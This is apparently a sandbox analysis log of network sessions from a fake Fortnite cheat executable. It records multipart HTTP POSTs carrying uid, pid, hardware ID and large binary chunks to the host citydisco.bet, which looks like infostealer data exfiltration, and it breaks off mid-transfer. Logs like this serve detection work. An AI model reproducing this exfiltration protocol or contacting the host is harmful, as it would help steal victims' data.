1	192.168.2.12	49688	188.114.96.3	443	6908	C:\Users\user\Desktop\FortniteHack.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:35:17 UTC	278	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GY1cY90wj17rafB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14512 Host: citydisco.bet
2025-03-13 12:35:17 UTC	14512	OUT	Data Raw: 2d 2d 47 59 31 63 59 39 30 77 6a 31 37 72 61 66 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 65 61 32 39 33 37 62 36 33 35 37 37 36 37 66 31 38 65 39 39 30 37 34 33 63 38 63 36 30 66 65 38 37 36 35 62 39 39 33 32 64 39 33 65 36 38 66 0d 0a 2d 2d 47 59 31 63 59 39 30 77 6a 31 37 72 61 66 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 59 31 63 59 39 30 77 6a 31 37 72 61 66 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 46 42 46 32 Data Ascii: --GY1cY90wj17rafBContent-Disposition: form-data; name="uid"0ea2937b6357767f18e990743c8c60fe8765b9932d93e68f--GY1cY90wj17rafBContent-Disposition: form-data; name="pid"2--GY1cY90wj17rafBContent-Disposition: form-data; name="hwid"CAFBF2
2025-03-13 12:35:18 UTC	814	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:35:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uTHi%2B7W2wEBEqC8xmH%2FNOVbOwuIm6eMnoG%2FSNTSdIc3ejGgnBB2P8U8DolLwwLC7QQgENtgO7YY%2FWda4AsPrFqitd4nMNcRukUfSf%2FTZCddb1LeGhGxYgYbiW0lj0FmE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb92053d32356f-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13330&min_rtt=13208&rtt_var=3927&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2831&recv_bytes=15448&delivery_rate=210878&cwnd=251&unsent_bytes=0&cid=db319b49c788d9a4&ts=974&x=0"
2025-03-13 12:35:18 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 31 37 2e 32 34 30 2e 31 30 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 76.217.240.104"}}
2025-03-13 12:35:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.12	49692	188.114.96.3	443	6908	C:\Users\user\Desktop\FortniteHack.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:35:20 UTC	281	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4i02DMxRAHB9Cf1G71 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15071 Host: citydisco.bet
2025-03-13 12:35:20 UTC	15071	OUT	Data Raw: 2d 2d 34 69 30 32 44 4d 78 52 41 48 42 39 43 66 31 47 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 65 61 32 39 33 37 62 36 33 35 37 37 36 37 66 31 38 65 39 39 30 37 34 33 63 38 63 36 30 66 65 38 37 36 35 62 39 39 33 32 64 39 33 65 36 38 66 0d 0a 2d 2d 34 69 30 32 44 4d 78 52 41 48 42 39 43 66 31 47 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 69 30 32 44 4d 78 52 41 48 42 39 43 66 31 47 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d Data Ascii: --4i02DMxRAHB9Cf1G71Content-Disposition: form-data; name="uid"0ea2937b6357767f18e990743c8c60fe8765b9932d93e68f--4i02DMxRAHB9Cf1G71Content-Disposition: form-data; name="pid"2--4i02DMxRAHB9Cf1G71Content-Disposition: form-data; name="hwid"
2025-03-13 12:35:21 UTC	811	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:35:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lGdnGUn9ENezqTARSeEqpF4Ukdpx6W8RtzyqC6N%2FpNFC1en6tp7vChh2RTpIJCeoCvX3z%2FJgtphpGysxzElsEeedWZ4QhlujlzrgYDmNzTi7jc4JS2vnilq6IyAm%2Bmt7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb921858d86213-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=36914&min_rtt=13119&rtt_var=22529&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2831&recv_bytes=16010&delivery_rate=220614&cwnd=234&unsent_bytes=0&cid=6cf9b8c6bb05afe4&ts=950&x=0"
2025-03-13 12:35:21 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 31 37 2e 32 34 30 2e 31 30 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 76.217.240.104"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.12	49697	188.114.96.3	443	6908	C:\Users\user\Desktop\FortniteHack.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:35:23 UTC	281	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=G3ze21wP3um4p7CE0v User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20247 Host: citydisco.bet
2025-03-13 12:35:23 UTC	15331	OUT	Data Raw: 2d 2d 47 33 7a 65 32 31 77 50 33 75 6d 34 70 37 43 45 30 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 65 61 32 39 33 37 62 36 33 35 37 37 36 37 66 31 38 65 39 39 30 37 34 33 63 38 63 36 30 66 65 38 37 36 35 62 39 39 33 32 64 39 33 65 36 38 66 0d 0a 2d 2d 47 33 7a 65 32 31 77 50 33 75 6d 34 70 37 43 45 30 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 33 7a 65 32 31 77 50 33 75 6d 34 70 37 43 45 30 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d Data Ascii: --G3ze21wP3um4p7CE0vContent-Disposition: form-data; name="uid"0ea2937b6357767f18e990743c8c60fe8765b9932d93e68f--G3ze21wP3um4p7CE0vContent-Disposition: form-data; name="pid"3--G3ze21wP3um4p7CE0vContent-Disposition: form-data; name="hwid"
2025-03-13 12:35:23 UTC	4916	OUT	Data Raw: a7 24 63 20 1a 9a 5f 5e bf 50 0a b1 c9 1e 51 10 16 37 a2 dd 9c 55 b0 bd 4a 2c 1f 74 65 e5 e0 54 80 aa 68 71 1c ec 66 37 e6 05 3a ca d4 1b 99 05 7b 2c 5e 6c b4 68 6e d1 5d 82 35 4c 1b 62 4f 74 11 97 74 fa d8 68 e7 5c 91 55 4b fa 08 2e 55 f7 33 06 6a d2 79 70 d6 8b e3 d2 18 88 05 6b 3b 91 dc b9 34 54 2d d2 2d 29 5c 39 94 72 eb 68 b8 e5 3d e9 c2 20 0e 7f 90 12 29 79 b5 40 b2 de 6c c3 93 d0 d0 ee c8 b2 41 48 78 2a ae 60 2b e0 bc 6a 53 34 bc 3d 34 bb 5d 71 40 97 a8 67 14 38 20 c4 fa c8 50 d0 51 4b ef 7b e2 3c f3 e6 55 73 57 04 00 c0 26 1f e5 fb 78 2c b0 45 fc 08 12 ef cf 0a 54 cd c4 90 43 37 ca 8c d5 ce c4 76 26 f9 66 c7 cd b9 ac 79 51 df 2a 67 af d6 93 c2 16 7a ef d7 eb cb 3d 09 19 40 c7 ec 07 ed 91 48 43 f4 24 11 9e ed 53 f0 15 a2 f9 2a a4 7b 7a 04 07 05 d2 Data Ascii: $c _^PQ7UJ,teThqf7:{,^lhn]5LbOtth\UK.U3jypk;4T--)\9rh= )y@lAHx`+jS4=4]q@g8 PQK{<UsW&x,ETC7v&fyQgz=@HC$S*{z
2025-03-13 12:35:24 UTC	813	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:35:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wJwcyZTmfHgK24L2xoxdt9GI%2BShwqkZACD661WD%2FkyT8AFKnqOhFCE8rP2sMIGi0DuDjkpt%2F4xhx3R%2FAVc7BzRkDjCltZFAg4Hxig6B7Bau3sQQ9Uu6VtJ5TCvtWAGkW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb9226db7d0042-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13839&min_rtt=13702&rtt_var=4117&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21208&delivery_rate=197746&cwnd=242&unsent_bytes=0&cid=df4fab19e5a28ee8&ts=1034&x=0"
2025-03-13 12:35:24 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 31 37 2e 32 34 30 2e 31 30 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 76.217.240.104"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.12	49698	188.114.96.3	443	6908	C:\Users\user\Desktop\FortniteHack.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:35:26 UTC	272	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QOjjdCtxM2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2413 Host: citydisco.bet
2025-03-13 12:35:26 UTC	2413	OUT	Data Raw: 2d 2d 51 4f 6a 6a 64 43 74 78 4d 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 65 61 32 39 33 37 62 36 33 35 37 37 36 37 66 31 38 65 39 39 30 37 34 33 63 38 63 36 30 66 65 38 37 36 35 62 39 39 33 32 64 39 33 65 36 38 66 0d 0a 2d 2d 51 4f 6a 6a 64 43 74 78 4d 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 4f 6a 6a 64 43 74 78 4d 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 46 42 46 32 38 30 38 45 35 41 46 44 44 32 34 30 32 36 39 Data Ascii: --QOjjdCtxM2Content-Disposition: form-data; name="uid"0ea2937b6357767f18e990743c8c60fe8765b9932d93e68f--QOjjdCtxM2Content-Disposition: form-data; name="pid"1--QOjjdCtxM2Content-Disposition: form-data; name="hwid"CAFBF2808E5AFDD240269
2025-03-13 12:35:27 UTC	813	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:35:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vz8ATRxmbob7ppjsyzD%2F3fpl6TyXJ2EBoRPKBQIs%2FVkQu%2Fnhvi4%2BLsRfEXaBUSdZrAv2vG77%2BjEij%2F0SJ5czsTznx09zL0UqHonFsMBh8g5Wecq57MIXwNPHug5oRNUJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb923cc8a6acb1-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=15157&min_rtt=14030&rtt_var=4881&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=3321&delivery_rate=203356&cwnd=238&unsent_bytes=0&cid=61160a207091f6d0&ts=976&x=0"
2025-03-13 12:35:27 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 31 37 2e 32 34 30 2e 31 30 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 76.217.240.104"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.12	49699	188.114.96.3	443	6908	C:\Users\user\Desktop\FortniteHack.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:35:29 UTC	272	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=a6vn7CLP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 550998 Host: citydisco.bet
2025-03-13 12:35:29 UTC	15331	OUT	Data Raw: 2d 2d 61 36 76 6e 37 43 4c 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 65 61 32 39 33 37 62 36 33 35 37 37 36 37 66 31 38 65 39 39 30 37 34 33 63 38 63 36 30 66 65 38 37 36 35 62 39 39 33 32 64 39 33 65 36 38 66 0d 0a 2d 2d 61 36 76 6e 37 43 4c 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 61 36 76 6e 37 43 4c 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 46 42 46 32 38 30 38 45 35 41 46 44 44 32 34 30 32 36 39 30 44 32 32 31 43 Data Ascii: --a6vn7CLPContent-Disposition: form-data; name="uid"0ea2937b6357767f18e990743c8c60fe8765b9932d93e68f--a6vn7CLPContent-Disposition: form-data; name="pid"1--a6vn7CLPContent-Disposition: form-data; name="hwid"CAFBF2808E5AFDD2402690D221C
2025-03-13 12:35:29 UTC	15331	OUT	Data Raw: 5d 88 51 37 fd 06 7f 2c 9c 48 6e 86 9e 5c 2b 8f 72 d6 1a e0 7c 38 5f b4 e7 cb 8f cc 94 ae f6 7b cb e8 44 bd 2d f6 ba 01 23 47 4f ce 51 75 7b f4 03 07 5a e9 03 b8 b1 7c bf 90 21 c7 0f 98 97 a6 05 25 37 d7 65 3a 8c e9 35 7e 54 df 8f 27 a2 f8 5d 76 a4 82 37 ef 5b 85 cf 16 a2 7f 68 39 c2 a1 7a 6b c6 78 ef 08 42 b0 c6 4a 19 8a 48 18 43 ae c0 c0 cc 0f f5 7d 10 f3 3c 8b 1d e8 24 cd 5b 2d bf 4d de 81 af 6c dc d1 85 d7 57 78 95 81 31 ce 5b e0 f4 90 d9 b2 5c 27 73 5d 01 bc 5f 92 bd 22 68 b6 ef 00 b6 27 fd 48 1f fe e6 51 1e a5 c3 5a 95 7e 96 8f a8 56 15 0e 1a 77 38 4a 13 d9 c2 11 a6 49 3e bc ce e9 d0 3b d2 89 56 8a 9e 65 0f 62 35 60 7d 9b a3 47 b3 58 2a 64 03 0f 9c 15 e3 a1 01 95 39 f0 5c d4 79 ca db 96 df a1 d7 d4 02 b7 a2 ca 9e 45 e2 2d 31 51 bd 14 81 1c 71 7d 24 Data Ascii: ]Q7,Hn\+r\|8_{D-#GOQu{Z\|!%7e:5~T']v7[h9zkxBJHC}<$[-MlWx1[\'s]_"h'HQZ~Vw8JI>;Veb5`}GX*d9\yE-1Qq}$
2025-03-13 12:35:29 UTC	15331	OUT	Data Raw: b4 fd a2 e7 d6 d5 f5 d7 8f 22 25 17 c0 52 ee 42 bc 92 55 81 ec 2d ac 53 9e 7f e0 08 28 4c 3c 4d 4a 2d 34 d8 d9 a0 c3 22 f1 bf b6 6b 43 8f aa b6 26 bc e1 b6 fb 55 9a 57 bb cf 69 22 ca ce ed 38 f9 c7 f0 0e 13 8f 60 5d ba b6 a6 3b 9a 78 f4 ac 83 9f ca 33 6e b4 27 e5 21 b5 ed 58 c3 08 a3 e5 d0 82 47 0e 94 f8 11 51 ab 34 a9 ec 41 17 51 f7 62 54 4a c2 86 95 b5 70 8a 91 47 df 06 50 ca 3d a3 a4 03 27 8a f4 8d 33 f1 c9 c5 08 5b 83 6f 58 7f 85 99 da 32 64 ad b3 2e 22 6e ca 31 3c 74 50 ca 08 0c db 21 25 c4 51 39 01 92 c8 f9 cd 79 81 90 5f cb 30 11 b4 68 2b ef c3 98 c1 84 9a 4d 0d 2a 03 aa 95 ca f4 60 3d 4f 1c 26 4a ca fe 62 84 a9 13 9a db bc 89 de f1 c0 ec 17 c3 33 cb 5c d8 e2 9b a7 6c cd 57 1d 9f 91 41 5f 29 1b 06 91 14 c9 cf 4c 4e d2 f0 80 72 14 d3 f8 29 4f 26 b0 Data Ascii: "%RBU-S(L<MJ-4"kC&UWi"8`];x3n'!XGQ4AQbTJpGP='3[oX2d."n1<tP!%Q9y_0h+M*`=O&Jb3\lWA_)LNr)O&
2025-03-13 12:35:29 UTC	15331	OUT	Data Raw: 31 e4 50 ef e6 b1 3c 7c c0 c2 80 22 04 6a 10 01 5e 92 6f 6b a6 fb c4 df 59 cc 03 1d fc df 42 63 b1 44 ba 43 4a a4 55 74 3f ec dd 1f e2 d7 1b 30 5d c0 65 98 fe a1 50 cc 65 d2 49 f4 6b d4 a9 3e 70 6d c7 12 83 a4 a2 5f a2 c4 ff 71 7d 1b cd 80 d3 08 18 c6 9c 4d ff 71 c3 45 be 77 81 f6 22 7c 89 f5 6f d3 05 32 5a 94 d5 ac 63 78 b1 8a 04 7f 22 dd cd 09 3b 0b 77 c9 51 6f 09 9b 35 bb be 59 80 05 b9 92 e4 9b 53 78 73 2d 9a c9 8a 56 aa 6e ac 64 6b ab f0 e0 ba 5c 51 21 94 90 cf 45 c0 76 9e 01 de e4 41 2c 58 5e d7 94 f4 11 16 fe 88 84 d7 2d 45 01 fb 88 b3 72 59 ba 4b 18 09 d3 93 70 9d 8a 3c fe 78 fa 53 e1 39 fc ad 39 30 cd 63 05 c7 2c 89 14 a3 b8 f8 84 71 ad c0 4c 2b 5e 85 d4 8a 6e e1 09 a6 01 a0 a4 5e 98 32 f2 66 e2 8b 53 75 6c 62 5e 72 eb ec e2 5a 6f c5 f8 10 41 7e Data Ascii: 1P<\|"j^okYBcDCJUt?0]ePeIk>pm_q}MqEw"\|o2Zcx";wQo5YSxs-Vndk\Q!EvA,X^-ErYKp<xS990c,qL+^n^2fSulb^rZoA~
2025-03-13 12:35:29 UTC	15331	OUT	Data Raw: b4 eb da 91 70 f1 39 21 85 34 e4 0c 49 d4 8e 98 58 f0 d4 66 9b 33 26 13 96 b3 96 8b 6a d5 2b 6e e5 29 6c 44 9f 09 16 57 6d 5f 3d 3d 48 c2 df 38 f9 02 e2 87 0c 0f 89 48 91 33 00 96 e9 9e f7 30 6c b5 81 b8 81 40 60 2d ff 10 1c 6c 8b 20 b8 42 cf 04 b6 26 d1 15 dd 86 27 f8 73 f2 cc ce e1 84 6d bf 59 98 42 3a f3 27 4a 74 ce 6b ac 5d 81 ca 22 0e ea 1f 24 11 bc 5a 04 62 69 59 c4 c9 a7 54 d9 28 eb 87 bd 10 1f 89 54 84 8f ce c9 59 b8 67 24 3c 68 32 69 d0 6b 5e bd dc 16 d5 eb 29 d4 bb cb fb d4 d7 18 0a 89 e1 87 88 13 9f ec be 71 c9 a2 62 4e 86 84 d7 5f 0d 7a a5 8e 1e a5 aa 6b 75 16 c3 d3 cf 1b 8d a4 e9 81 23 4b ef 4a 7c 04 82 40 ab b2 5c a4 b0 6f 1c 9e 97 d4 30 e8 2a 24 b8 93 68 9b 4f ef bc fa 6b 87 e4 a8 15 d4 d5 ff e8 7a 3d fe ab c9 9a ed ac 53 57 48 ce e0 40 38 Data Ascii: p9!4IXf3&j+n)lDWm_==H8H30l@`-l B&'smYB:'Jtk]"$ZbiYT(TYg$<h2ik^)qbN_zku#KJ\|@\o0*$hOkz=SWH@8
2025-03-13 12:35:29 UTC	15331	OUT	Data Raw: da cb 55 1e f0 89 93 40 df d0 f9 53 46 9a 44 68 e2 99 e5 22 37 fb 4b 14 23 38 5e 23 d9 ff 5a 75 46 92 cb 4f d7 0b dd 73 37 6f c2 a5 22 e5 7c 65 36 23 d5 91 6b 51 8d 6f 83 ea da 30 30 9c fd e4 c0 e7 57 7d 03 38 2e 71 fe e8 a1 1f 12 e8 3a a3 fe 1b b6 af c2 42 49 95 73 de c5 e9 1f 53 9e 2b 33 e9 20 0d 1b f8 c3 84 aa 60 c4 b0 3b 60 a3 84 b1 a1 4d b6 9d 9c 65 fc 8f 2f 12 a8 5d 4a 80 98 17 39 1b 34 a6 d8 cb 3b 03 57 24 ad cd 90 00 a3 60 33 37 a8 17 8e f6 68 20 dd a6 75 0f 5c 0b 5b c6 29 9b 5d 8e 61 7f ff 35 c1 ca 47 54 50 e6 7a 8d 05 10 a1 0a fd da 2d 23 2d 68 66 9c 00 2e dd 2e f7 66 ab 94 5f 26 88 c8 ed cf 1a 26 0c 27 11 51 cd ef 52 2b fd dd 01 90 75 ff 89 36 dd e5 f0 bc 83 90 64 8d 03 d9 c9 15 35 dc 90 88 f9 b2 0a 47 1e c9 08 ec 29 c0 17 7b 34 7e 8a b3 f7 8c Data Ascii: U@SFDh"7K#8^#ZuFOs7o"\|e6#kQo00W}8.q:BIsS+3 `;`Me/]J94;W$`37h u\[)]a5GTPz-#-hf..f_&&'QR+u6d5G){4~
2025-03-13 12:35:29 UTC	15331	OUT	Data Raw: f1 a9 90 ad fc 0f 5b fe 47 43 d1 97 11 7a 26 da ec df 95 59 aa 0f b3 96 52 6c cf 60 a3 0e da e8 02 37 47 42 e8 0b e6 6a 22 9e 59 5c 13 d5 45 5d b3 f4 e2 80 1b f8 71 dd ac c9 bf e5 36 33 c8 4b b7 47 ea fe 7e 8d e1 82 6f 57 f9 c8 a3 1b 92 ee 3c f6 64 a8 3a 0e a3 ea 23 5f 07 a9 a5 97 4c d8 fa 13 e8 40 a3 93 d8 1a c5 e6 81 5b 83 22 c0 a3 94 f3 c6 05 a8 0c e8 c6 aa 11 2d 24 fd ae 54 48 14 61 ac e3 73 90 50 26 af e1 0e be 26 2e 57 d9 3c 75 25 ab f4 a0 46 20 c9 fb ec 6c f4 d7 1f 04 55 e9 ba 8c ac 4e 24 9a 34 67 99 60 93 d9 ef 08 7f fc 5a 04 cd 43 43 39 fe df 1a d7 47 cd 79 a1 13 73 08 8c f4 2a 22 45 a3 97 52 96 1a 40 7f ca 6b 03 06 31 24 fb 99 5c 65 e4 fb a0 5d 27 b2 65 91 3c 4d 6a d8 9a 9a 8a 80 77 21 79 8f 6f 0f 6b d8 ab da 60 ba 93 ef 69 7b f8 ce b6 56 84 87 Data Ascii: [GCz&YRl`7GBj"Y\E]q63KG~oW<d:#_L@["-$THasP&&.W<u%F lUN$4g`ZCC9Gys*"ER@k1$\e]'e<Mjw!yok`i{V
2025-03-13 12:35:29 UTC	15331	OUT	Data Raw: 4b ff a7 bf 03 ae 6f b1 d2 8b 47 ce 40 5b 11 ff b1 88 5e 59 6c 25 d0 33 af 0b 6d 36 fd df 2c c0 a4 9d a2 e5 df f3 39 e7 10 ac 5b f3 99 48 45 87 e7 2b dc 84 81 db d1 db 4c a2 12 bc a4 ec 89 ee 99 ba b0 ce 4d 55 ad 4f 10 e7 ba 0d 4d e1 a8 8d ff 88 9a 6f a2 78 97 40 f7 bf 88 13 d6 63 e2 d6 52 47 ac 5f bd ac bd a5 d9 b0 b7 1c f1 c7 70 c9 3f 04 27 74 fb a5 c9 a6 e6 7e 28 52 f9 22 4d aa b0 2b 1a 03 53 5f 00 98 0c 1d fa 2f ea 8a aa 45 95 64 8f 5a 4c fd 64 c5 87 44 30 7d 17 64 1b a8 b2 91 82 8d e3 0f 3a a6 6f 8d 47 7e ee 06 0a f6 ce a5 e6 4e f3 a5 d7 e8 9b 03 7b fd b2 24 14 9d 57 fa 5b 73 9a 00 48 7f 91 a2 b9 ed 40 4a 42 cd 2c 7b 07 0b 5b bb aa dc 8b 2c 7d a0 f6 fe 10 41 11 c9 aa 00 9c 00 55 7a 3e 70 be 94 f2 51 b4 53 5f 24 a1 7a 3a 73 50 2a 42 ca c4 b3 0e 5d 65 Data Ascii: KoG@[^Yl%3m6,9[HE+LMUOMox@cRG_p?'t~(R"M+S_/EdZLdD0}d:oG~N{$W[sH@JB,{[,}AUz>pQS_$z:sP*B]e
2025-03-13 12:35:29 UTC	15331	OUT	Data Raw: be 2b 77 5a 53 85 06 7a ec 5a 35 0a 8b 34 95 3e 3d 76 e7 86 e7 06 df 6e 58 5f d5 59 1e ae 1f cd d3 f6 36 81 09 ba 38 60 5d df 52 b3 8a e3 7e 83 d3 da 66 7b 65 8f b0 00 e2 89 4b f7 f0 db 32 c5 07 f9 39 01 45 25 c3 cd 68 21 39 eb ad f5 2d 12 a9 d0 9c 69 9d 78 46 ce 65 b1 7e 68 84 f8 e5 be 35 37 72 2a be 19 4b 1c 92 59 60 e4 1b c9 aa b0 1c 9d 58 7d ee fa 18 09 f4 c7 57 aa fd f5 3c a1 b1 51 bd 18 6e 76 b7 42 c4 f6 3d 78 d7 80 9f 8a 49 4f 83 81 88 0f da 68 3f 1c fa 1f 4a d8 8c 75 c0 79 4d d9 5a 58 ff 1f c2 fb 75 d3 77 97 ca d2 47 1d 08 e2 bf 05 a2 59 64 07 e9 40 41 09 24 34 dd 78 ee 2e fb e3 e8 3f b7 09 e9 90 2e a8 14 18 c2 52 72 a9 ae d7 e9 a1 54 13 65 9a d4 3c 12 64 